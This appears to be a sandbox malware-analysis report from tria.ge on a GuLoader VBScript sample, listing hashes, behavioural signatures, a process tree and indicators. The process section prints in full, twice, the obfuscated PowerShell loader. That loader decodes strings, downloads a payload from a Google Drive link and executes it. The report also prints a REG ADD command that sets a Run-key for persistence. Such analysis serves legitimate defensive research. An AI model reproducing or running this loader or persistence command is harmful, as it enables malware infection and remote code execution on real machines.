Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
24/04/2024, 01:59
Static task
static1
Behavioral task
behavioral1
Sample
e5ec544c99937977cbd0e3df39fcf93f234ff1855ceb23a758a98ba1dfa0c002.vbs
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
e5ec544c99937977cbd0e3df39fcf93f234ff1855ceb23a758a98ba1dfa0c002.vbs
Resource
win10v2004-20240226-en
General
-
Target
e5ec544c99937977cbd0e3df39fcf93f234ff1855ceb23a758a98ba1dfa0c002.vbs
-
Size
279KB
-
MD5
d51dd423c5f2103977df604208989252
-
SHA1
4944a47a3a05658a7fec601bf526c7913832c587
-
SHA256
e5ec544c99937977cbd0e3df39fcf93f234ff1855ceb23a758a98ba1dfa0c002
-
SHA512
e91bc05bd874233aa264b244ae0ff0faa0fed6ca4161d2af89f8da4099b79c55b6837cf14416a5e1031faf80cf46b3a821803c432a5d7cc99798367509647709
-
SSDEEP
6144:L6dAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scOb987HIJFJW:WnS2ImtCo5inX
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 6 IoCs
flow pid Process 3 2736 WScript.exe 6 2736 WScript.exe 10 2588 powershell.exe 12 2588 powershell.exe 14 2588 powershell.exe 16 2588 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Figenkaktussers% -w 1 $Cyklingens=(Get-ItemProperty -Path 'HKCU:\\Eksogenes154\\').Slockingstone;%Figenkaktussers% ($Cyklingens)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 10 drive.google.com 18 drive.google.com 9 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2984 wab.exe 2984 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1288 powershell.exe 2984 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1288 set thread context of 2984 1288 powershell.exe 35 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 3064 reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2588 powershell.exe 1288 powershell.exe 1288 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1288 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2588 powershell.exe Token: SeDebugPrivilege 1288 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2736 wrote to memory of 2588 2736 WScript.exe 29 PID 2736 wrote to memory of 2588 2736 WScript.exe 29 PID 2736 wrote to memory of 2588 2736 WScript.exe 29 PID 2588 wrote to memory of 2480 2588 powershell.exe 31 PID 2588 wrote to memory of 2480 2588 powershell.exe 31 PID 2588 wrote to memory of 2480 2588 powershell.exe 31 PID 2588 wrote to memory of 1288 2588 powershell.exe 33 PID 2588 wrote to memory of 1288 2588 powershell.exe 33 PID 2588 wrote to memory of 1288 2588 powershell.exe 33 PID 2588 wrote to memory of 1288 2588 powershell.exe 33 PID 1288 wrote to memory of 948 1288 powershell.exe 34 PID 1288 wrote to memory of 948 1288 powershell.exe 34 PID 1288 wrote to memory of 948 1288 powershell.exe 34 PID 1288 wrote to memory of 948 1288 powershell.exe 34 PID 1288 wrote to memory of 2984 1288 powershell.exe 35 PID 1288 wrote to memory of 2984 1288 powershell.exe 35 PID 1288 wrote to memory of 2984 1288 powershell.exe 35 PID 1288 wrote to memory of 2984 1288 powershell.exe 35 PID 1288 wrote to memory of 2984 1288 powershell.exe 35 PID 1288 wrote to memory of 2984 1288 powershell.exe 35 PID 2984 wrote to memory of 2568 2984 wab.exe 36 PID 2984 wrote to memory of 2568 2984 wab.exe 36 PID 2984 wrote to memory of 2568 2984 wab.exe 36 PID 2984 wrote to memory of 2568 2984 wab.exe 36 PID 2568 wrote to memory of 3064 2568 cmd.exe 38 PID 2568 wrote to memory of 3064 2568 cmd.exe 38 PID 2568 wrote to memory of 3064 2568 cmd.exe 38 PID 2568 wrote to memory of 3064 2568 cmd.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e5ec544c99937977cbd0e3df39fcf93f234ff1855ceb23a758a98ba1dfa0c002.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Polymicrobial = 1;$Dieselises='Substrin';$Dieselises+='g';Function armlnene($Agurker){$Monastic=$Agurker.Length-$Polymicrobial;For($Liquidise=5; $Liquidise -lt $Monastic; $Liquidise+=(6)){$Caprices+=$Agurker.$Dieselises.Invoke($Liquidise, $Polymicrobial);}$Caprices;}function Alkoholindholds($Feriekoloniens){. ($Deceives) ($Feriekoloniens);}$Tiberen=armlnene '.enthM Bar oA roszAsbesiRetralKammel HaniaBaron/Hidat5 Valg.Maale0 otte Dugdu(McdonWDesori C.itnMolesdMayhaoConvewBinoms Dyed Rev.lNCheckTVilde Skvis1 S,ak0Gravi.Samar0 Bjer;Cypri S,ciaWLurkiiEnfign Kukr6.rifl4.iplo;Overe BlomsxTjavs6Binma4,utpu; Spaa byror DrukvFabr :Plasm1Wathm2.orde1Sangu.Bes.i0Engra)Organ salgsGSodereSubr.c Wet kSulpho.isma/spr,g2Villi0Hamat1 Fis 0Midde0,ever1 dis 0Darli1ikldt GrackFStetiiGeotarSkoleeF ensf jattoSophixCroto/Bo de1Clutc2Hmorr1,ffen. Co,l0Sk.bs ';$Kontrolkortets=armlnene 'UnretUSyno,s B gge IndfrAllod-UpthrA PlengKo maeF,eecn Sipht J,de ';$Nondeterminant=armlnene 'L.bathB,blitFili tMue.lp Unp,s.intm:Hypof/Repro/Datamd U.str attriUnabevDomfle Bath.Allegg Nicko Isc oProt.gNonaslLysetePrimr.UdhuscPeberoConcrm Naza/ SojauHklincI,gen?Mi kseHerpexRe.sspForduoUnmatrSmi,tt Vice=SborgdMang,oHemodw Ice.nBesnrlsti.noRe.ncafiks,dLenit&Enrapi Labid ,ryl=Vek e1RhinofYdmygwGaloceSkrabtTrom.AObedim MondcImper8LegeoxHorseVrej.iaL,ucoeOversAinebr3MarbeJ KuskVOve.l1Inimi6DrejeqU skeuFiltrsDdninGTehusxB,gni6In.irtAtomauA,regl R,beiTract6Si tnSResta0 ResiWRocka ';$Mileplens=armlnene 'Flesh> Inte ';$Deceives=armlnene 'Poly.iB ptoeStatixKfert ';$Leary='Tonsillectomy';Alkoholindholds (armlnene 'BortaSJournepaymatInest-AfhndCSkytsoUreten GidstTabubeNas.ln P.ottArau. Medle-BeslaP gtg,aForpotUnesthCorec G psuTFlout:,udge\.fterB GallePe.tisAbsory.idnenRold gbeluseHjspnlSelvbsomsaleTra trFe,ernSkyldeIt.hps Scen1 Law.7Drift4svbe,.Krkomt Wh nxTjahttSubve impre-KadenV.evala For lCoa,tuM,rkee.dapi b nde$ .enzLBirkeeshamaa skubrst tsyBabys;Reolp ');Alkoholindholds (armlnene 'G.ntiiInherf Fot. Saani(Horn tPhotoe Pegos,tikktRegi,-Dellip.ingua Mus.tVandahTunge S.netTSlitt:rodom\gardeBBlyaneSirdasSponsy Prefn Infog H eteEksprlatek,s S lieCyclorNutjonB miseHenstsGrnse1Toupe7 Out 4Woma..ionist AzimxFrettt Esti)Biote{As,ireOr.ogx.illai orgetLo gp} vig; Tan. ');$Ragtimey = armlnene 'BlndieS,ddecStinghLuftmoBi.aa Hjemk%Co.sua DelspCep,apdemisdDucefaL.pratGulsoaForlo%Ferie\ precUKernenSkinse.ribrxM,ntahB.ndfaDecoluTrim.sUegent .nikeUnrebdLepiolDemenyFlage.HelliB,prineMorgeaBet.n paike&My lo&Bygge ForpoeStadsc Besih AnaloRejeo Skrve$birdh ';Alkoholindholds (armlnene '.ldel$HystegCitollAvancoHaubebcrookablindlCorbi: ForbITitremNonblpskyggrbrugeo Ces.cMindrr Ga,eeUmag.aDynelnSlarit,axes4blu c0 Tall=Boneh(BeoercPostlmForsyd Femk Unde/PalmicD ner kary$ SassRVacila TeltgVitamtSilveiDi,hrmShetleBdeanyD vas)Vatte ');Alkoholindholds (armlnene 'Modsi$ forhg RetflDiakroTilemb cgilaSyenolL.gis:TalkuSInwrauMaskipkyll.e hospr indbeEncorxVolaic Homee DelilRechal .dgieDybstnSe,vscStrafe As r=Rande$kartoNRedreoSnigmnAffildStnineBotultFug.eeAuspirEgocemElithiAktionForvia assn Sindtpar.b.salonsGlis.p,kolelHospiiCu.sttBahoe(Femto$ FellMForeti Und,lRebegeS.mipp ArumlmedleeFlug.nrangesP.eum) beta ');$Nondeterminant=$Superexcellence[0];Alkoholindholds (armlnene 'He.om$Ch.rtgCongrl ineaofagocbTriplaNabchlMiljs:DemerSAnodee Ca,kmE.domiBaskedLysa oAttricPodopuDerm m OxideSpisen ,ristReassaEm,esrTegnkyRegis=SulphN UmiseMischwH nde-Sm,abOZebusbInterjsaltleBe rac,waggtSvag. K,rsSV,lkay ndkbsNelumtRephaeRecesmBorou. SuzaNBusteeSideotPrepa.gaeldWMidwaeP,stlbF ninC ScumlFlseriBedrieSk,lsnBefrit Voca ');Alkoholindholds (armlnene 'Cent,$ eserSMicroeRese.m Bevii AdvedShaddoSp.ndcPaintuMidrimslavee SnknnTracntPainta Farvr.yrovyUdsty.WilcoH Cloae Sp,aa Lystd stigeTeknor Cr psLumbe[Alka,$SignaKKeelbo T,van NdritPalmaravistoliplelPotenkFiskeoovererAlbyltSulfoeSho.pt p,gesPa he]Tonsi=Leuco$OvermT TermiT,uckbHove,ef,licr Maa,e HyponSamme ');$Kylling=armlnene 'HolomS Radoe,gnspmUnstai SocidPsychobr stcIkkevuT.xtimBridoe AntinIntertC,amoaI,legrHoc.lyGali..Reth.Dc.ineoBenzowPlotznPr.ktlQuamaoSidera C mpd UncaFSlagsiCon.rlIns.leFarve( dfol$DominN TachoDumbenMo.ord Rigse JordtIn ineTrninrB uremKl,ppiKodninAmatraFirednB,sebtTilsk,Chond$,emjeU W rrdKanarsR ndmk.ndivr AuchiZo,lofMindstHaandsDonjopMethirLivr.o Fo,agPittsrBlodsa odebmPanelmAfvnneUnitut PeddsBriti) emag ';$Kylling=$Improcreant40[1]+$Kylling;$Udskriftsprogrammets=$Improcreant40[0];Alkoholindholds (armlnene ' aspt$Hu megRe ril Ra,sog,wnsb.nsigaUntowlOptag:Circul,ncipoGrossp So,upEnkeleUdlans Ceret SuppiuspilkTrost=Planc(TombsTBdelle Ro.psBoudot.rege-Sp,gePAsh.laSosostIngu,h .yst uncia$ ArtaUUd.ibdPlagesFrem.kHaverrEstraiS.jrsfN ntht LupisIndhep enigrProgroEglamg P,ycruvenha Ef.emSalgsmstre.eArge,tCoffesTan.o) Ring ');while (!$loppestik) {Alkoholindholds (armlnene 'mute.$KleptgMultilTutoroE,perb rtilaMessil Snap: SypiFDristi Koumr SkrucPreimigra.afsync.r ildie LoottErhves.unni= Svov$ TasttDi kvr.aarsuSter.eNonar ') ;Alkoholindholds $Kylling;Alkoholindholds (armlnene 'Co.ntS FroutSekunaGlykorIn igt Ca f-ScareSAssiml Maske DepoeNonpapUnlit Nonex4nedtr ');Alkoholindholds (armlnene 'Nepot$St.dsgcytozl Evito hypob EvigaSamsol ,ort:KemiklHyp ioHumispD.carpRegnseShonks .eaptGenneigorank Oden=Kogek(SnvreTCessieAmicusMinimtMaiz -bnskrPGyrosa ApprtforedhFusio Don t$PhageU Pebed,ivelsHelb kFrimrr To di PincfConvetByggessubcopAstigrLi,jeoKaskegCopairSubtyaM.termudsk m LamneMeteot F,rbsImpro).dbre ') ;Alkoholindholds (armlnene 'Asona$Lsninget.eelBoychoTransb Schea ,onglIl,uv: flovF,riftr Lnk eBispemTintatpoecirDemagy BryslBoremlKvante hirt=Ress,$ZonargJokinlL,quaoLaanebSo.teaeksislGenba: GtteSNoteseSl.gsmSelvpeB.noksCon.etMakarr.egrea Fa.vlSuk.e+Ga le+Skoli%Enri,$RadioS ErotubasicpK igsefryserelecteTandsx I trcseks eCariclDampslBrnese GaelnDaimocrefere Nono. R.ndc.tavnoThromuBogienHy est Sy i ') ;$Nondeterminant=$Superexcellence[$Fremtrylle];}Alkoholindholds (armlnene ' Beta$Heav.gKlaphlParaloHinaybAntikaT.neslHovek:nonexCSubc.rTilkaaOve,lpSubatePlaybtHa matArmbreMillw Jerki=Pup.l Se irGSkarpeAg rhtJentj-GamasClac.roYpotrn ForstHippoeOutsin ServtOyste .ent$,ryptU Se idDedicsSygevkNetvrr For.i NybyfForsttLatens PrinpUdsterPommeoTornyg HujerPassla Coarm eprimFjerdeBet,atAn epsTaenk ');Alkoholindholds (armlnene 'Tjekk$ escrgAntenlA,tmaoCarnibIfaldaSubdelV,der: BraiVAmiraiTro,lvSpurgiRhampaPreffnBrune Altin=Te ra Orto [BouilS Pandy,iklasTopogtquinieKildemn.tur..enarCKurveo OstenMinisvUrtegePer,crUdl.stSuper] A,fa:Lolla: RetuFr.giorAfstnoAuctimCrocoBColliaP olssObstee Omkr6Sturd4,rediSCr.nktDukysr DarkiKohemnFlybogPodso(To dk$Ord.eC Ant rA.cona.hackpBremse RetutStavetFortueSides)Rambu ');Alkoholindholds (armlnene 'Skumb$BuklegC noolUnderoApostbSu siaHya olditsi: enapPSlvsiaHv.serRigseaSpukefTinperDulmpa OransUnfraeFunkt brand= reno Blind[ OphoSMagney,hephsP,gmetFaceheBa.qumTurne.Cy.riT,mugkeRekinxKvintt T.in.PaterEWeenan,labecOviceo Alied GeneiNeofinLi,hogSkr,v] G,eg:Rente:Lush.ArdgraSMappeCJebliIStje,IDrawc.JirblGBilineEctoptVillaSForskt Fehar SammiV rksn AnvegStopu(p aty$NonliVExcesiKumenvSejrti ogbaShittnjunef) sabe ');Alkoholindholds (armlnene ' .all$ NedbgOpskrlHistooHaemobBund.ap,otulFjerk:Ee ssWStyltaDyf,esOrdenh GalsaAla.tkArbe i .lui5Udlev1Aflad= .syl$Misa.P Intea Air.rAerobaVenulfCroupr U lea Cures Kbeke Flov.Access ShaduD,ivkbForl sPhalatA.fiarunc.iiAluminKnowlgForse(Agdis3s.mic1,enin0Armbi6A.iri1Sh,ma2Polyh, Whi,2Lion.8c.iti5indry2levne6Therm) Kvin ');Alkoholindholds $Washaki51;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unexhaustedly.Bea && echo $"3⤵PID:2480
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Polymicrobial = 1;$Dieselises='Substrin';$Dieselises+='g';Function armlnene($Agurker){$Monastic=$Agurker.Length-$Polymicrobial;For($Liquidise=5; $Liquidise -lt $Monastic; $Liquidise+=(6)){$Caprices+=$Agurker.$Dieselises.Invoke($Liquidise, $Polymicrobial);}$Caprices;}function Alkoholindholds($Feriekoloniens){. ($Deceives) ($Feriekoloniens);}$Tiberen=armlnene '.enthM Bar oA roszAsbesiRetralKammel HaniaBaron/Hidat5 Valg.Maale0 otte Dugdu(McdonWDesori C.itnMolesdMayhaoConvewBinoms Dyed Rev.lNCheckTVilde Skvis1 S,ak0Gravi.Samar0 Bjer;Cypri S,ciaWLurkiiEnfign Kukr6.rifl4.iplo;Overe BlomsxTjavs6Binma4,utpu; Spaa byror DrukvFabr :Plasm1Wathm2.orde1Sangu.Bes.i0Engra)Organ salgsGSodereSubr.c Wet kSulpho.isma/spr,g2Villi0Hamat1 Fis 0Midde0,ever1 dis 0Darli1ikldt GrackFStetiiGeotarSkoleeF ensf jattoSophixCroto/Bo de1Clutc2Hmorr1,ffen. Co,l0Sk.bs ';$Kontrolkortets=armlnene 'UnretUSyno,s B gge IndfrAllod-UpthrA PlengKo maeF,eecn Sipht J,de ';$Nondeterminant=armlnene 'L.bathB,blitFili tMue.lp Unp,s.intm:Hypof/Repro/Datamd U.str attriUnabevDomfle Bath.Allegg Nicko Isc oProt.gNonaslLysetePrimr.UdhuscPeberoConcrm Naza/ SojauHklincI,gen?Mi kseHerpexRe.sspForduoUnmatrSmi,tt Vice=SborgdMang,oHemodw Ice.nBesnrlsti.noRe.ncafiks,dLenit&Enrapi Labid ,ryl=Vek e1RhinofYdmygwGaloceSkrabtTrom.AObedim MondcImper8LegeoxHorseVrej.iaL,ucoeOversAinebr3MarbeJ KuskVOve.l1Inimi6DrejeqU skeuFiltrsDdninGTehusxB,gni6In.irtAtomauA,regl R,beiTract6Si tnSResta0 ResiWRocka ';$Mileplens=armlnene 'Flesh> Inte ';$Deceives=armlnene 'Poly.iB ptoeStatixKfert ';$Leary='Tonsillectomy';Alkoholindholds (armlnene 'BortaSJournepaymatInest-AfhndCSkytsoUreten GidstTabubeNas.ln P.ottArau. Medle-BeslaP gtg,aForpotUnesthCorec G psuTFlout:,udge\.fterB GallePe.tisAbsory.idnenRold gbeluseHjspnlSelvbsomsaleTra trFe,ernSkyldeIt.hps Scen1 Law.7Drift4svbe,.Krkomt Wh nxTjahttSubve impre-KadenV.evala For lCoa,tuM,rkee.dapi b nde$ .enzLBirkeeshamaa skubrst tsyBabys;Reolp ');Alkoholindholds (armlnene 'G.ntiiInherf Fot. Saani(Horn tPhotoe Pegos,tikktRegi,-Dellip.ingua Mus.tVandahTunge S.netTSlitt:rodom\gardeBBlyaneSirdasSponsy Prefn Infog H eteEksprlatek,s S lieCyclorNutjonB miseHenstsGrnse1Toupe7 Out 4Woma..ionist AzimxFrettt Esti)Biote{As,ireOr.ogx.illai orgetLo gp} vig; Tan. ');$Ragtimey = armlnene 'BlndieS,ddecStinghLuftmoBi.aa Hjemk%Co.sua DelspCep,apdemisdDucefaL.pratGulsoaForlo%Ferie\ precUKernenSkinse.ribrxM,ntahB.ndfaDecoluTrim.sUegent .nikeUnrebdLepiolDemenyFlage.HelliB,prineMorgeaBet.n paike&My lo&Bygge ForpoeStadsc Besih AnaloRejeo Skrve$birdh ';Alkoholindholds (armlnene '.ldel$HystegCitollAvancoHaubebcrookablindlCorbi: ForbITitremNonblpskyggrbrugeo Ces.cMindrr Ga,eeUmag.aDynelnSlarit,axes4blu c0 Tall=Boneh(BeoercPostlmForsyd Femk Unde/PalmicD ner kary$ SassRVacila TeltgVitamtSilveiDi,hrmShetleBdeanyD vas)Vatte ');Alkoholindholds (armlnene 'Modsi$ forhg RetflDiakroTilemb cgilaSyenolL.gis:TalkuSInwrauMaskipkyll.e hospr indbeEncorxVolaic Homee DelilRechal .dgieDybstnSe,vscStrafe As r=Rande$kartoNRedreoSnigmnAffildStnineBotultFug.eeAuspirEgocemElithiAktionForvia assn Sindtpar.b.salonsGlis.p,kolelHospiiCu.sttBahoe(Femto$ FellMForeti Und,lRebegeS.mipp ArumlmedleeFlug.nrangesP.eum) beta ');$Nondeterminant=$Superexcellence[0];Alkoholindholds (armlnene 'He.om$Ch.rtgCongrl ineaofagocbTriplaNabchlMiljs:DemerSAnodee Ca,kmE.domiBaskedLysa oAttricPodopuDerm m OxideSpisen ,ristReassaEm,esrTegnkyRegis=SulphN UmiseMischwH nde-Sm,abOZebusbInterjsaltleBe rac,waggtSvag. K,rsSV,lkay ndkbsNelumtRephaeRecesmBorou. SuzaNBusteeSideotPrepa.gaeldWMidwaeP,stlbF ninC ScumlFlseriBedrieSk,lsnBefrit Voca ');Alkoholindholds (armlnene 'Cent,$ eserSMicroeRese.m Bevii AdvedShaddoSp.ndcPaintuMidrimslavee SnknnTracntPainta Farvr.yrovyUdsty.WilcoH Cloae Sp,aa Lystd stigeTeknor Cr psLumbe[Alka,$SignaKKeelbo T,van NdritPalmaravistoliplelPotenkFiskeoovererAlbyltSulfoeSho.pt p,gesPa he]Tonsi=Leuco$OvermT TermiT,uckbHove,ef,licr Maa,e HyponSamme ');$Kylling=armlnene 'HolomS Radoe,gnspmUnstai SocidPsychobr stcIkkevuT.xtimBridoe AntinIntertC,amoaI,legrHoc.lyGali..Reth.Dc.ineoBenzowPlotznPr.ktlQuamaoSidera C mpd UncaFSlagsiCon.rlIns.leFarve( dfol$DominN TachoDumbenMo.ord Rigse JordtIn ineTrninrB uremKl,ppiKodninAmatraFirednB,sebtTilsk,Chond$,emjeU W rrdKanarsR ndmk.ndivr AuchiZo,lofMindstHaandsDonjopMethirLivr.o Fo,agPittsrBlodsa odebmPanelmAfvnneUnitut PeddsBriti) emag ';$Kylling=$Improcreant40[1]+$Kylling;$Udskriftsprogrammets=$Improcreant40[0];Alkoholindholds (armlnene ' aspt$Hu megRe ril Ra,sog,wnsb.nsigaUntowlOptag:Circul,ncipoGrossp So,upEnkeleUdlans Ceret SuppiuspilkTrost=Planc(TombsTBdelle Ro.psBoudot.rege-Sp,gePAsh.laSosostIngu,h .yst uncia$ ArtaUUd.ibdPlagesFrem.kHaverrEstraiS.jrsfN ntht LupisIndhep enigrProgroEglamg P,ycruvenha Ef.emSalgsmstre.eArge,tCoffesTan.o) Ring ');while (!$loppestik) {Alkoholindholds (armlnene 'mute.$KleptgMultilTutoroE,perb rtilaMessil Snap: SypiFDristi Koumr SkrucPreimigra.afsync.r ildie LoottErhves.unni= Svov$ TasttDi kvr.aarsuSter.eNonar ') ;Alkoholindholds $Kylling;Alkoholindholds (armlnene 'Co.ntS FroutSekunaGlykorIn igt Ca f-ScareSAssiml Maske DepoeNonpapUnlit Nonex4nedtr ');Alkoholindholds (armlnene 'Nepot$St.dsgcytozl Evito hypob EvigaSamsol ,ort:KemiklHyp ioHumispD.carpRegnseShonks .eaptGenneigorank Oden=Kogek(SnvreTCessieAmicusMinimtMaiz -bnskrPGyrosa ApprtforedhFusio Don t$PhageU Pebed,ivelsHelb kFrimrr To di PincfConvetByggessubcopAstigrLi,jeoKaskegCopairSubtyaM.termudsk m LamneMeteot F,rbsImpro).dbre ') ;Alkoholindholds (armlnene 'Asona$Lsninget.eelBoychoTransb Schea ,onglIl,uv: flovF,riftr Lnk eBispemTintatpoecirDemagy BryslBoremlKvante hirt=Ress,$ZonargJokinlL,quaoLaanebSo.teaeksislGenba: GtteSNoteseSl.gsmSelvpeB.noksCon.etMakarr.egrea Fa.vlSuk.e+Ga le+Skoli%Enri,$RadioS ErotubasicpK igsefryserelecteTandsx I trcseks eCariclDampslBrnese GaelnDaimocrefere Nono. R.ndc.tavnoThromuBogienHy est Sy i ') ;$Nondeterminant=$Superexcellence[$Fremtrylle];}Alkoholindholds (armlnene ' Beta$Heav.gKlaphlParaloHinaybAntikaT.neslHovek:nonexCSubc.rTilkaaOve,lpSubatePlaybtHa matArmbreMillw Jerki=Pup.l Se irGSkarpeAg rhtJentj-GamasClac.roYpotrn ForstHippoeOutsin ServtOyste .ent$,ryptU Se idDedicsSygevkNetvrr For.i NybyfForsttLatens PrinpUdsterPommeoTornyg HujerPassla Coarm eprimFjerdeBet,atAn epsTaenk ');Alkoholindholds (armlnene 'Tjekk$ escrgAntenlA,tmaoCarnibIfaldaSubdelV,der: BraiVAmiraiTro,lvSpurgiRhampaPreffnBrune Altin=Te ra Orto [BouilS Pandy,iklasTopogtquinieKildemn.tur..enarCKurveo OstenMinisvUrtegePer,crUdl.stSuper] A,fa:Lolla: RetuFr.giorAfstnoAuctimCrocoBColliaP olssObstee Omkr6Sturd4,rediSCr.nktDukysr DarkiKohemnFlybogPodso(To dk$Ord.eC Ant rA.cona.hackpBremse RetutStavetFortueSides)Rambu ');Alkoholindholds (armlnene 'Skumb$BuklegC noolUnderoApostbSu siaHya olditsi: enapPSlvsiaHv.serRigseaSpukefTinperDulmpa OransUnfraeFunkt brand= reno Blind[ OphoSMagney,hephsP,gmetFaceheBa.qumTurne.Cy.riT,mugkeRekinxKvintt T.in.PaterEWeenan,labecOviceo Alied GeneiNeofinLi,hogSkr,v] G,eg:Rente:Lush.ArdgraSMappeCJebliIStje,IDrawc.JirblGBilineEctoptVillaSForskt Fehar SammiV rksn AnvegStopu(p aty$NonliVExcesiKumenvSejrti ogbaShittnjunef) sabe ');Alkoholindholds (armlnene ' .all$ NedbgOpskrlHistooHaemobBund.ap,otulFjerk:Ee ssWStyltaDyf,esOrdenh GalsaAla.tkArbe i .lui5Udlev1Aflad= .syl$Misa.P Intea Air.rAerobaVenulfCroupr U lea Cures Kbeke Flov.Access ShaduD,ivkbForl sPhalatA.fiarunc.iiAluminKnowlgForse(Agdis3s.mic1,enin0Armbi6A.iri1Sh,ma2Polyh, Whi,2Lion.8c.iti5indry2levne6Therm) Kvin ');Alkoholindholds $Washaki51;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unexhaustedly.Bea && echo $"4⤵PID:948
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Figenkaktussers% -w 1 $Cyklingens=(Get-ItemProperty -Path 'HKCU:\Eksogenes154\').Slockingstone;%Figenkaktussers% ($Cyklingens)"5⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Figenkaktussers% -w 1 $Cyklingens=(Get-ItemProperty -Path 'HKCU:\Eksogenes154\').Slockingstone;%Figenkaktussers% ($Cyklingens)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:3064
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5da01ef5875e8858c0beb46c6d81d4ca3
SHA186e74c388bc127b4b86bb0dc60ff51263c25a1fd
SHA2561ae8c384700d41b64df089ec2b2ea71a5e06c2e13125c041e67a137293d45ec7
SHA512f7af2a957b25e8dfaa1d55e51df1c8b1d71fc96a729a5b67c71653b32ab77a10217106c273b96cf52a96186f4c63ff7886d2bf5288c8bbfc225487dfb2328525
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5f014c11b50758e428d5a1e13cc6ba200
SHA1efac713a30e29e8d93b70736c82006e0648dccd5
SHA25660150106147ab1beed6fb6aef832c44e701675eb09e1cc852dd1960611062cd1
SHA512b919a6dfe97283c0512329ccdd8a9d25284309e39d9ddae6354f7129370953d8ba04c524861a7558eabb34ed6a0a29a9f67a95516bb19a2b3d8e0f362be0ae03
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5a4e8b15d33481d61de73e4e2565b0dc9
SHA1641afeccf235c071651708dbb56de41d03983169
SHA2566b9876424214819504df7bfb8a8d8fb1372197386ebc0b7c39c2d82efe62a430
SHA51214022f74703a9ba188d9a550a5f0c5a34ff9bd097558ed890d5ddc8cac1bc7ddba704edc7584e64bba12c1f6f1dc24b1110e2f0306da84c1e5b0b43296656b1f
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
